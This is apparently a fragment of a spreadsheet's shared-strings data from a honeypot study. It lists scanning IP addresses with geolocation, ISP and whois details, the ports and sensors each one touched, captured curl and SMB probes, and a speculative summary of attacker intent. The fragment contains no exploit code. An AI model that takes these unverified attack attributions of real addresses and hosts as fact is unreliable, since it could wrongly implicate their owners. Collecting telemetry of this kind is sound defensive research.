    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'korea.services.net': ['unknown']}</t>
  </si>
  <si>
    <t>query&amp;&amp;login&amp;&amp;connection&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc47:bbab</t>
  </si>
  <si>
    <t>819d324dd5a82ad6fb9a8c09fc88af35</t>
  </si>
  <si>
    <t>88.243.39.148</t>
  </si>
  <si>
    <t>35</t>
  </si>
  <si>
    <t>İzmir Province</t>
  </si>
  <si>
    <t>Karşıyaka İlçesi</t>
  </si>
  <si>
    <t>Cordaleo</t>
  </si>
  <si>
    <t>308988</t>
  </si>
  <si>
    <t>35580</t>
  </si>
  <si>
    <t>38.5032</t>
  </si>
  <si>
    <t>27.1259</t>
  </si>
  <si>
    <t>TTNET</t>
  </si>
  <si>
    <t>::ffff:58f3:2794</t>
  </si>
  <si>
    <t>78a02073294c4460694fd9329a508f8e</t>
  </si>
  <si>
    <t>103.76.80.53</t>
  </si>
  <si>
    <t>22.5726</t>
  </si>
  <si>
    <t>88.3639</t>
  </si>
  <si>
    <t>45804</t>
  </si>
  <si>
    <t>Meghbela Cable &amp; Broadband Services (P) Ltd</t>
  </si>
  <si>
    <t>Infiniti Television And Telecom Private Limited</t>
  </si>
  <si>
    <t>2016-09-28</t>
  </si>
  <si>
    <t>INFITEL</t>
  </si>
  <si>
    <t>{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,52581)}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,53123)}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,55515)}&amp;&amp;{Data_SMB:Incoming connection (103.76.80.53,55899)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:674c:5035</t>
  </si>
  <si>
    <t>f28e4820266eb89a446568308832fb19</t>
  </si>
  <si>
    <t>121.179.150.231</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H4</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;42225&amp;&amp;8539&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>502-200</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:79b3:96e7</t>
  </si>
  <si>
    <t>63e1df0dff3c14ac0cd07b712db4f152</t>
  </si>
  <si>
    <t>61.0.227.133</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>National Internet Backbone</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (61.0.227.133,56014)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,56067)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57001)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,53810)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58390)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58403)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,59361)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,62023)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,63009)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58996)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,59024)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,60030)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,49990)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50075)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50992)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,62791)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,62796)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,63575)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57631)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57664)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58593)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57356)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57469)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50744)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50816)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51782)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51811)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51815)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,52632)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,55716)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,55783)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,56895)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,61037)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,61140)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,61828)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,64382)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,64508)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,65524)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50221)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50284)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,51526)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57811)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57856)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58786)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,49495)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,49530)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,50275)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57815)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,57818)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (61.0.227.133,58506)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:3d00:e385</t>
  </si>
  <si>
    <t>a8d5367e6efe1f77c50d8cd8336ff17d</t>
  </si>
  <si>
    <t>180.255.96.106</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;32928&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b4ff:606a</t>
  </si>
  <si>
    <t>7658934d6e5c161dc8d0f84dcdc75fca</t>
  </si>
  <si>
    <t>47.18.62.221</t>
  </si>
  <si>
    <t>NA&amp;&amp;ool-2f123edd.dyn.optonline.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>Connecticut</t>
  </si>
  <si>
    <t>Greater Bridgeport Planning Region</t>
  </si>
  <si>
    <t>Bridgeport</t>
  </si>
  <si>
    <t>5282804</t>
  </si>
  <si>
    <t>06602</t>
  </si>
  <si>
    <t>41.1792</t>
  </si>
  <si>
    <t>-73.1894</t>
  </si>
  <si>
    <t>6128</t>
  </si>
  <si>
    <t>Cablevision Systems Corp.</t>
  </si>
  <si>
    <t>Optimum Online (Cablevision Systems)</t>
  </si>
  <si>
    <t>Optimum WiFi</t>
  </si>
  <si>
    <t>2012-02-29</t>
  </si>
  <si>
    <t>NETBLK-WIFI-BLK6</t>
  </si>
  <si>
    <t>1996-10-07 04:00:00</t>
  </si>
  <si>
    <t>2025-10-06 04:00:00</t>
  </si>
  <si>
    <t>2024-10-06 14:30:18</t>
  </si>
  <si>
    <t>['AUTHNS1.CV.NET', 'AUTHNS1.CVNET.COM']</t>
  </si>
  <si>
    <t>['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientRenewProhibited https://icann.org/epp#clientRenewProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']</t>
  </si>
  <si>
    <t>Registration Private</t>
  </si>
  <si>
    <t>abuse@godaddy.com</t>
  </si>
  <si>
    <t>['DomainsByProxy.com', '100 S. Mill Ave, Suite 1600']</t>
  </si>
  <si>
    <t>::ffff:2f12:3edd</t>
  </si>
  <si>
    <t>fe027eff5ef765da550e8aedcf82d757</t>
  </si>
  <si>
    <t>220.90.186.109</t>
  </si>
  <si>
    <t>1835235</t>
  </si>
  <si>
    <t>36.3491</t>
  </si>
  <si>
    <t>127.385</t>
  </si>
  <si>
    <t>2002-08-29</t>
  </si>
  <si>
    <t>::ffff:dc5a:ba6d</t>
  </si>
  <si>
    <t>4586b81dd2d6b54e6f49c1a349db6f4e</t>
  </si>
  <si>
    <t>203.101.44.198</t>
  </si>
  <si>
    <t>2004-01-09</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (203.101.44.198,56598)}</t>
  </si>
  <si>
    <t>::ffff:cb65:2cc6</t>
  </si>
  <si>
    <t>3dc38c66d2ae1394e9b012ed0d443206</t>
  </si>
  <si>
    <t>211.230.56.240</t>
  </si>
  <si>
    <t>{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:d3e6:38f0</t>
  </si>
  <si>
    <t>beca9a877826d1f41084046e282e93f5</t>
  </si>
  <si>
    <t>211.228.245.2</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_FTP_H27&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;57655&amp;&amp;21&amp;&amp;3306&amp;&amp;53888&amp;&amp;3060&amp;&amp;80&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:d3e4:f502</t>
  </si>
  <si>
    <t>f5dcce662fdba596818a252fd21645ec</t>
  </si>
  <si>
    <t>122.160.172.92</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;445&amp;&amp;34174&amp;&amp;1433&amp;&amp;60503&amp;&amp;60498</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (122.160.172.92,55409)}</t>
  </si>
  <si>
    <t>::ffff:7aa0:ac5c</t>
  </si>
  <si>
    <t>df2dd4d9bb0f5a21a34338f5e9a1b2de</t>
  </si>
  <si>
    <t>1.231.222.20</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39198&amp;&amp;80&amp;&amp;26745</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:1e7:de14</t>
  </si>
  <si>
    <t>cd8b83ae023e695e265fffcba1121036</t>
  </si>
  <si>
    <t>175.200.208.28</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>26951&amp;&amp;61074&amp;&amp;23&amp;&amp;33838&amp;&amp;33863&amp;&amp;33909&amp;&amp;33879&amp;&amp;33895&amp;&amp;33919&amp;&amp;34543&amp;&amp;NA</t>
  </si>
  <si>
    <t>2010-01-27</t>
  </si>
  <si>
    <t>::ffff:afc8:d01c</t>
  </si>
  <si>
    <t>939df8cc466643f989442a612db24b65</t>
  </si>
  <si>
    <t>125.228.165.220</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-228-165-220.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>::ffff:7de4:a5dc</t>
  </si>
  <si>
    <t>9e7c78eea456445096cedad830c80ae0</t>
  </si>
  <si>
    <t>220.120.48.118</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;64421&amp;&amp;9100&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc78:3076</t>
  </si>
  <si>
    <t>The attacker is likely scanning for open services and testing credentials on various systems, including databases and network devices. They are also attempting to exploit vulnerabilities and gain unauthorized access. &amp;&amp; The attacker is attempting to scan and gather information about various services on the targeted network, potentially using tools like Nmap or Nikto to identify vulnerabilities. They are probing for open ports and sending malicious requests to exploit potential weaknesses.</t>
  </si>
  <si>
    <t>Port scanning and service scanning</t>
  </si>
  <si>
    <t>f6dc33d0f0da94c36c0bd4ef4527ab9f</t>
  </si>
  <si>
    <t>61.80.194.115</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;44355&amp;&amp;46647&amp;&amp;46668&amp;&amp;NA&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:3d50:c273</t>
  </si>
  <si>
    <t>de27b27af5de73c68af25403de2e4e64</t>
  </si>
  <si>
    <t>180.183.246.225</t>
  </si>
  <si>
    <t>NA&amp;&amp;mail.c-tech.ac.th</t>
  </si>
  <si>
